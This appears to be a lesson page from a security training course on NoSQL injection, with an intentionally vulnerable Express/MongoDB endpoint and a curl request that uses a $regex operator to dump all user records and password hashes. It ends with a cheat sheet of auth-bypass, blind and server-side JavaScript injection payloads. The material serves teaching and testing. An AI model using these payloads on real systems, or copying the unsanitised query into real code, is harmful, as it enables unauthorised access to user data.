Introduction to NoSQL Injection

What is NoSQL Injection?

When user input is incorporated into a NoSQL query without being properly sanitized first, NoSQL injection may occur. If an attacker can control part of the query, they may subvert the logic and get the server to carry out unintended actions / return unintended results. Since NoSQL has no standardized query language like SQL does, NoSQL injection attacks look different in the various NoSQL implementation.

Scenario (Node.JS)

Let's imagine an Express / Node.JS webserver that uses MongoDB to store its user's information. This server has the endpoint /api/v1/getUser, which allows you to retrieve a user's information from their username.

// Express is a Web-Framework for Node.JS
const express = require('express');
const app = express();
app.use(express.json()); // Tell Express to accept JSON request bodies

// MongoDB driver for Node.JS and the connection string
// for our local MongoDB database
const {MongoClient} = require('mongodb');
const uri = "mongodb://127.0.0.1:27017/test";
const client = new MongoClient(uri);

// POST /api/v1/getUser
// Input (JSON): {"username": <username>}
// Returns: User details where username=<username>
app.post('/api/v1/getUser', (req, res) => {
    client.connect(function(_, con) {
        const cursor = con
            .db("example")
            .collection("users")
            .find({username: req.body['username']});
        cursor.toArray(function(_, result) {
            res.send(result);
        });
    });
});

// Tell Express to start our server and listen on port 3000
app.listen(3000, () => {
  console.log(`Listening...`);
});

Note: In practice this would likely be a GET request like /api/v1/getUser/<username>, but for the sake of simplicity it is a POST here.

The intended use of this endpoint looks like this:

[!bash!]$ curl -s -X POST http://127.0.0.1:3000/api/v1/getUser -H 'Content-Type: application/json' -d '{"username": "gerald1992"}' | jq

[
  {
    "_id": "63667326b7417b004543513a",
    "username": "gerald1992",
    "password": "0f626d75b12f77ede3822843320ed7eb",
    "role": 1,
    "email": "[email protected]"
  }
]

We posted the /api/v1/getUser endpoint with the body {"username": "gerald1992"}, and the server used that to generate the full query db.users.find({username: "gerald1992"}) and returned the results to us.

The problem is that the server blindly uses whatever we give it as the username query without any filters or checks. Below is an example of code that is vulnerable to NoSQL injection:

...
.find({username: req.body['username']});
...

A simple example of exploiting this injection vulnerability is using the $regex operator described in the previous section to coerce the server into returning the information of all users (whose usernames match /.*/), like this:

[!bash!]$ curl -s -X POST http://127.0.0.1:3000/api/v1/getUser -H 'Content-Type: application/json' -d '{"username": {"$regex": ".*"}}' | jq

[
  {
    "_id": "63667302b7417b0045435139",
    "username": "bmdyy",
    "password": "f25a2fc72690b780b2a14e140ef6a9e0",
    "role": 0,
    "email": "[email protected]"
  },
  {
    "_id": "63667326b7417b004543513a",
    "username": "gerald1992",
    "password": "0f626d75b12f77ede3822843320ed7eb",
    "role": 1,
    "email": "[email protected]"
  }
]

Types of NoSQL Injection

If you are familiar with SQL injection, then you will already be familiar with the various classes of injections that we may encounter:

In-Band: When the attacker can use the same channel of communication to exploit a NoSQL injection and receive the results. The scenario from above is an example of this.
Blind: This is when the attacker does not receive any direct results from the NoSQL injection, but they can infer results based on how the server responds.
Boolean: Boolean-based is a subclass of blind injections, which is a technique where attackers can force the server to evaluate a query and return one result or the other if it is True or False.
Time-Based: Time-based is the other subclass of blind injections, which is when attackers make the server wait for a specific amount of time before responding, usually to indicate if the query is evaluated as True or False.

Moving On

With the basics of NoSQL injection explained, let's move on to some more in-depth examples.

Previous Next

Tools of the Trade

Defending against NoSQL Injection

Preventing NoSQL Injection Vulnerabilities

Skills Assessment

Skills Assessment I Skills Assessment II

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

MongoDB Usage

Connect to MongoDB: mongosh mongodb://127.0.0.1:27017
List databases: show databases
List collections: show collections
Insert data: db.collection.insertOne({...})
Insert lots of data: db.apples.insertMany([{...},{...},...])
Selecting data: db.collection.find({...})
Selecting one piece of data: db.collection.findOne({...})
Update (one) document: db.collection.updateOne({...}, {...})
Update multiple documents: db.collection.updateMany({...}, {...})
Delete document(s): db.apples.remove({...})

Query Operators

Type	Operator	Description	Example
Comparison	`$eq`	Matches values which are `equal to` a specified value	`type: {$eq: "Pink Lady"}`
Comparison	`$gt`	Matches values which are `greater than` a specified value	`price: {$gt: 0.30}`
Comparison	`$gte`	Matches values which are `greater than or equal to` a specified value	`price: {$gte: 0.50}`
Comparison	`$in`	Matches values which exist `in the specified array`	`type: {$in: ["Granny Smith", "Pink Lady"]}`
Comparison	`$lt`	Matches values which are `less than` a specified value	`price: {$lt: 0.60}`
Comparison	`$lte`	Matches values which are `less than or equal to` a specified value	`price: {$lte: 0.75}`
Comparison	`$nin`	Matches values which are `not in the specified array`	`type: {$nin: ["Golden Delicious", "Granny Smith"]}`
Logical	`$and`	Matches documents which `meet the conditions of both` specified queries	`$and: [{type: 'Granny Smith'}, {price: 0.65}]`
Logical	`$not`	Matches documents which `do not meet the conditions` of a specified query	`type: {$not: {$eq: "Granny Smith"}}`
Logical	`$nor`	Matches documents which `do not meet the conditions` of any of the specified queries	`$nor: [{type: 'Granny Smith'}, {price: 0.79}]`
Logical	`$or`	Matches documents which `meet the conditions of one` of the specified queries	`$or: [{type: 'Granny Smith'}, {price: 0.79}]`
Evaluation	`$mod`	Matches values which divided by a `specific divisor` have the `specified remainder`	`price: {$mod: [4, 0]}`
Evaluation	`$regex`	Matches values which `match a specified RegEx`	`type: {$regex: /^G.*/}`
Evaluation	`$where`	Matches documents which `satisfy a JavaScript expression`	`$where: 'this.type.length === 9'`

Authentication Bypass / Data Exfiltration Payloads:

URL-Encoded

param[$ne]=x
param[$gt]=
param[$gte]=
param[$lt]=~
param[$lte]=~
param[$regex]=.*

JSON

{param: {$ne: 'x'}}
{param: {$gt: ''}}
{param: {$gte: ''}}
{param: {$lt: '~'}}
{param: {$lte: '~'}}
{param: {$regex: '.*'}}
{param: {$nin: []}}

Blind NoSQLi Payloads:

URL-Encoded

param[$regex]=^XYZ.*$

JSON

{param: {$regex: '^XYZ.*$}}

Server-Side JavaScript Injection Payloads:

' || true || ''=='
" || true || ""=="

This cheat sheet contains a (non-comprehensive) list of payloads you may use when testing an application for NoSQL injection vulnerabilities. The most important qualities for finding vulnerabilities are creativity and the ability to adapt, so it is possible that these payloads will not work in your specific scenario, but something else does.

Some other resources you may want to refer to may be:

Introduction to NoSQL Injection

Introduction to NoSQL Injection

What is NoSQL Injection?

Scenario (Node.JS)

Types of NoSQL Injection

Moving On

Table of Contents

Introduction

Basic NoSQL Injection

Blind Data Exfiltration

Tools of the Trade

Defending against NoSQL Injection

Skills Assessment

My Workstation